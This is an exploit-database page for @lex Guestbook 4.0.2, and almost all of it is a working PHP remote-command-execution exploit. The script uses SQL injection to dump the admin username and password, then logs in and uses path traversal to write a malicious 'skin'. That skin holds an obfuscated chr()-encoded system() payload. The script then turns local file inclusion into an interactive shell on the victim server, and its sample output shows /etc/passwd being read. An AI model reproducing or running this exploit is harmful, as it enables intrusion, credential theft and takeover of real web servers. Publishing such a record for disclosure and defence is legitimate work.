@lex Guestbook <= 4.0.2 Remote Command Execution Exploit

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053055 漏洞类型
发布时间 2007-01-14 更新时间 2007-01-14
CVE编号 CVE-2007-0202
CVE-2007-0205
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2007010052
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/php
<?php

/**
 * This file require the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");

/*/
 |
 | header> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit
 | header> ========================================================
 | status> Retrieving the administrator password
 | sploit> AdminUsername::root
 | sploit> AdminPassword::toor
 | status> Trying to get logged in
 | sploit> Done
 | status> Trying to add a skin
 | sploit> Done
 | status> Writing the malicious skin
 | $shell> whoami
 | darkfig
 |
 | $shell> cat /etc/passwd ...
 | 
/*/

if($argc < 2)
{
	print "n---------------------------------------------------------";
	print "nAffected.scr..: @lex Guestbook <= 4.0.2"; // last version 
	print "nPoc.ID........: 20070107";
	print "nType..........: PHP Code Execution";
	print "nRisk.level....: High";
	print "nSrc.download..: www.alexphpteam.com";
	print "nPoc.link......: acid-root.new.fr/poc/20070107.txt";
	print "nCredits.......: DarkFig";
	print "n---------------------------------------------------------";
	print "nUsage.........: php xpl.php <url>";
	print "nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
	print "nExample.......: php xpl.php http://victim.com/@lexgb/";
	print "n---------------------------------------------------------n";
	exit(1);
}

$url=$argv[1];
$prs=$argv[2];
$pra=$argv[3];

$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
if(!empty($prs)) $xpl->proxy($prs);
if(!empty($pra)) $xpl->proxyauth($pra);

/*/
 |
 | index.php
 | =========
 | ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
 |
 | 
 | livre_include.php -> Local File Inclusion
 | =================
 | ... set_magic_quotes_runtime(0); // thx =)
 | ... if (isset($_GET['lang']) && $_GET['lang'] && file_exists($chem_absolu."languages/".$_GET['lang'].".".$alex_livre_ext)
)
 | $f_language = str_replace("..","",$_GET['lang']); // We can't use .... because of file_exists() verification but ... =]
 | include($chem_absolu."languages/".$f_language.".".$alex_livre_ext);
 | 
 |
 |  index.php -> SQL Injection
 |  =========
 |  ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'"); 
 |  // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre`
 | 
/*/

$sql = "index.php?lang=english.php%00'%20union%20select%20".
       "concat('XPLLogin:',(select%20login%20from%20alex_livr".
       "e_users%20LIMIT%201),'XPLPass:',(select%20pass%20from".
       "%20alex_livre_users%20LIMIT%201))/*";
       
print "nheader> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit";
print "nheader> ========================================================";
print "nstatus> Retrieving the administrator password";
$xpl->get($url.$sql);

if(preg_match('#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#',$xpl->getcontent(),$co
unt)) 
print "nsploit> AdminUsername::".$count[1]."nsploit> AdminPassword::".$count[2];
else die("nsploit> Exploit failed");

print "nstatus> Trying to get logged in";
$xpl->post($url."admin/index.php","f_login=".$count[1]."&f_pass=".$count
[2]."&f_identif=Identification");
if(preg_match("#f_cadres.php?f_sid=([a-z0-9]{32})#",$xpl->getheader(),
$sid)) print "nsploit> Done";
else die("nsploit> Exploit failed");

print "nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755)
$xpl->post($url."admin/skins.php?f_sid=".$sid[1],"aj_skin=../../language
s/d4h4x0rskin&ajouter=Ajouter");
if(!preg_match('#alert("ERREURn#',$xpl->getcontent())) print "nsploit> Done";
else die("nsploit> Exploit failed");

$scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d).".
         "chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).".
         "chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).".
         "chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45).".
         "chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27).".
         "chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52).".
         "chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52).".
         "chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)";

$data  = "skin_edit=skins.php%3Ff_sid%3D".$sid[1]."%26skin_edit".
         "%3D../../languages/d4h4x0rskin&alex_livre=<?phprn@e".
         "val($scode);exit(0);rn?>&add_message=&nb_message_pa".
         "ge=&list_pages=&corps_messages=&space=&assembly=&enre".
         "gistrer=Enregistrer";

print "nstatus> Writing the malicious skinn$shell> ";
// skins.php ... write($chem_absolu."templates/skins/".$_GET['skin_edit']."/".$tab_templa
te_guestbook[$i])
$xpl->post($url."admin/skins.php?skin_edit=../../languages/d4h4x0rskin&f
_sid=".$sid[1],$data);

while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
    $xpl->addheader("Referer",$cmd);
    $xpl->get($url."index.php?lang=d4h4x0rskin/alex_livre.css%00");
    print $xpl->getcontent();
    print "n$shell> ";
}